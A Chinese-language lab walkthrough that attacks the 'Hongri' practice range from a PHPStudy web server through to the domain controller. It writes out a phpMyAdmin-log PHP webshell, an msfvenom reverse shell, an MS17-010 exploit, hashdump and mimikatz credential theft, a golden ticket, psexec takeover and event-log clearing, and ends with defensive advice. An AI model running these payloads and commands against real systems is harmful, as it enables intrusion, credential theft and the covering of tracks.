从零构建内网渗透实战PHPStudy环境下的红日靶场攻防演练在网络安全领域内网渗透测试是检验企业防御体系完整性的重要手段。本文将带领读者使用常见的PHPStudy环境搭建红日靶场通过模拟真实攻击路径从外网Web渗透逐步深入内网最终获取域控制器权限。整个过程将避开复杂的环境配置专注于可复现的实战技巧。1. 环境准备与初始配置1.1 靶场环境搭建红日靶场模拟了典型的企业网络架构包含三台虚拟机主机角色操作系统IP地址(外网)IP地址(内网)Web服务器Windows 7192.168.134.135192.168.52.143域成员服务器Windows Server 2003无192.168.52.141域控制器Windows Server 2008无192.168.52.138关键配置步骤为Web服务器配置双网卡NAT模式网卡用于模拟公网访问仅主机模式网卡用于内网通信统一内网网段为192.168.52.0/24所有系统默认密码设置为hongrisec2019注意实际环境中请确保所有虚拟机处于隔离网络避免意外影响真实系统1.2 渗透工具准备建议使用Kali Linux作为攻击机主要工具包括# 更新工具库 sudo apt update sudo apt upgrade -y # 安装必要工具 sudo apt install -y metasploit-framework dirsearch wappalyzer whatwebWindows环境下推荐安装Burp Suite Community代理拦截蚁剑Webshell管理Nmap端口扫描2. 外网突破Web应用渗透2.1 信息收集与指纹识别首先对Web服务器进行基本信息收集# 使用whatweb识别CMS whatweb http://192.168.134.135 # 目录扫描注意调整线程数避免被封 dirsearch -u http://192.168.134.135 -e php,asp,aspx,jsp -t 20扫描结果通常包含phpMyAdmin管理界面/phpmyadmin/网站备份文件/bak.zipPHP探针页面/l.php关键发现PHP版本5.4.45存在已知漏洞phpMyAdmin版本通过访问/documenation.html确认中间件Apache 2.4.23 (Win32)2.2 phpMyAdmin漏洞利用针对发现的phpMyAdmin采用日志写入Webshell的方法登录phpMyAdmin默认账号root/root执行SQL语句开启全局日志SET global general_logon; SET global general_log_fileC:/phpStudy/WWW/shell.php;通过查询写入PHP代码SELECT ?php eval($_POST[cmd]);?;使用蚁剑连接WebshellURLhttp://192.168.134.135/shell.php连接密码cmd提示如果遇到写入限制检查secure_file_priv参数状态SHOW VARIABLES LIKE %secure%3. 内网横向移动3.1 建立持久化通道通过蚁剑上传MSF生成的木马# Kali生成反向TCP木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST攻击机IP LPORT5555 -f exe shell.exe在MSF中启动监听use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 攻击机IP set LPORT 5555 exploit3.2 内网信息收集获取meterpreter会话后执行# 获取网络拓扑 run get_local_subnets # 添加路由 run autoroute -s 192.168.52.0/24 # 探测内网存活主机 use auxiliary/scanner/discovery/arp_sweep set RHOSTS 192.168.52.0/24 run关键信息域名称god.org域控制器192.168.52.138域成员192.168.52.1413.3 漏洞利用与权限提升针对发现的Windows Server 2003192.168.52.141进行MS17-010漏洞检测use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.52.141 run确认存在漏洞后发起攻击use exploit/windows/smb/ms17_010_psexec set RHOST 192.168.52.141 set payload windows/meterpreter/bind_tcp exploit成功获取系统权限后提取哈希# 获取哈希 hashdump # 或者使用mimikatz获取明文 load kiwi creds_all4. 域控攻防实战4.1 黄金票据攻击获取域管理员哈希后可以伪造Kerberos票证# 获取域SID whoami /all # 使用mimikatz生成黄金票据 golden_ticket_create -u Administrator -d god.org -s S-1-5-21-1218... -k krbtgt哈希4.2 域控最终接管通过PSExec直接连接域控use exploit/windows/smb/psexec set RHOST 192.168.52.138 set SMBUser Administrator set SMBPass hongrisec2019 set payload windows/x64/meterpreter/bind_tcp exploit成功获取域控权限后可进行组策略修改日志清除后门植入5. 防御措施与痕迹清理5.1 攻击痕迹清除# 清除事件日志 clearev # 删除创建的文件 del C:\\phpStudy\\WWW\\shell.php # 恢复phpMyAdmin配置 SET global general_logoff;5.2 防御建议针对本次渗透中利用的漏洞企业应phpMyAdmin防护修改默认路径设置强密码限制访问IP内网安全加固及时安装MS17-010补丁启用Windows Defender防火墙配置SMB签名域控安全监控Kerberos异常请求定期更换krbtgt账户密码启用LSA保护在实际测试中发现Windows Server 2003对MS17-010的防御最为薄弱而2008系统虽然也存在漏洞但需要更精确的利用方式。建议初学者先从2003系统入手理解原理再逐步挑战更高版本的系统。